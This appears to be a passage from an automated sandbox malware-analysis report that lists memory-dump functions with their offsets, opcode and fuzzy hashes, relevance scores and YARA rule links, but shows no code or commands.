                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ec1d4ba58a28cee4869b51b6865fe5388e040653eb09a32b9e29afc2d5a9eb11
                                                                  • Instruction ID: 6654396d656962bc32b4978ad436145cfa2366e3f40d746bd0f20927f2ff3d5f
                                                                  • Opcode Fuzzy Hash: ec1d4ba58a28cee4869b51b6865fe5388e040653eb09a32b9e29afc2d5a9eb11
                                                                  • Instruction Fuzzy Hash: 4812E821F19A494BE7A8EB7C5479ABC7BD1FF98310F4505B9E04EC32E7DD28A8018781
                                                                  Function 00007FFD9B7F0E78 Relevance: .5, Instructions: 504COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b83c0ec7f5058b9a9b9ddc81b15eefd6b6522ebbc5f9bf18b0c118606d9101bc
                                                                  • Instruction ID: df80337c3597060a2938b827f56ae8e6181ca011664ebed9fcf2ed636ede7d0e
                                                                  • Opcode Fuzzy Hash: b83c0ec7f5058b9a9b9ddc81b15eefd6b6522ebbc5f9bf18b0c118606d9101bc
                                                                  • Instruction Fuzzy Hash: CFD14826F0D6994BD764FBBCA479AFD3BA0EF84324B4546B9E05DC71E3DC1868018780
                                                                  Function 00007FFD9B7F0C3E Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c0c97a37d71cf1bb9e65855d01c0e3198d20ce422f9c276f6c7ce6452db9f11
                                                                  • Instruction ID: fe84e0507ebdf423db87c98ba1a4a446c133dbd397c94bdba5399e727bf9d293
                                                                  • Opcode Fuzzy Hash: 4c0c97a37d71cf1bb9e65855d01c0e3198d20ce422f9c276f6c7ce6452db9f11
                                                                  • Instruction Fuzzy Hash: 31510620B0E7CA0FE756AB7898656B57FE1DF8621474901FBD48DC72EBCD18AC428352
                                                                  Function 00007FFD9B7F0AD1 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
                                                                  • Instruction ID: 879d763f58f6b617892d41a78e4adf72bebd74b2930531c2375b81262c93e0eb
                                                                  • Opcode Fuzzy Hash: 74861c5b6bcaabd9c38614c637be1b4ed299d2d5a82303e58ee00a8be350ec2b
                                                                  • Instruction Fuzzy Hash: 40310921F19A4A4FE744BFBC48696BC77E2EF98715F0503B6E01CC32E6DE2858018392
                                                                  Function 00007FFD9B7F0985 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8833b229df6a483f36344ae61209d6080a799585aafeb715f5ea9dfd61278024
                                                                  • Instruction ID: 07c68be7c43c6b589c1ebd1fc550ea80e63d8ff6679d8d2e55ad092b897866e2
                                                                  • Opcode Fuzzy Hash: 8833b229df6a483f36344ae61209d6080a799585aafeb715f5ea9dfd61278024
                                                                  • Instruction Fuzzy Hash: 7831D234B18A4D8FDB44EBA8D465AEDBBB1FF98310F4405B8D019C73D6DE38A8018780
                                                                  Function 00007FFD9B7F0855 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5a53fa0dfd550c3c5fa3de538a804dfbab7edd5f7427fdb45fac3c87a792a86
                                                                  • Instruction ID: 3354b5a2391ae2c3e6be98cf0e064903ddf965df0b19a25192da406ab2e3bbe2
                                                                  • Opcode Fuzzy Hash: e5a53fa0dfd550c3c5fa3de538a804dfbab7edd5f7427fdb45fac3c87a792a86
                                                                  • Instruction Fuzzy Hash: 3D31F23475DA8D4FD344EF2CA4A4DAA7F71AF8932078544E5D458CB3DBCD28A902C751

                                                                  Non-executed Functions

                                                                  Function 00007FFD9B7F06FA Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2941612268.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ffd9b7f0000_SYSTEM.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <M_^$=M_^$M_^j$M_^p
                                                                  • API String ID: 0-3547729567
                                                                  • Opcode ID: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
                                                                  • Instruction ID: 437c6c835e2d4413b3a321e204eb7f50774393548620ce426e0885ba3bfb9231
                                                                  • Opcode Fuzzy Hash: 94bde1aa506ee9daf63da347d970920297bbcdf60167c394250fa25fe49f358e
                                                                  • Instruction Fuzzy Hash: 14318FABF0D59A89E61276EC64665EC3B909F8073971B83F2C07DCA2E3DC14304645E5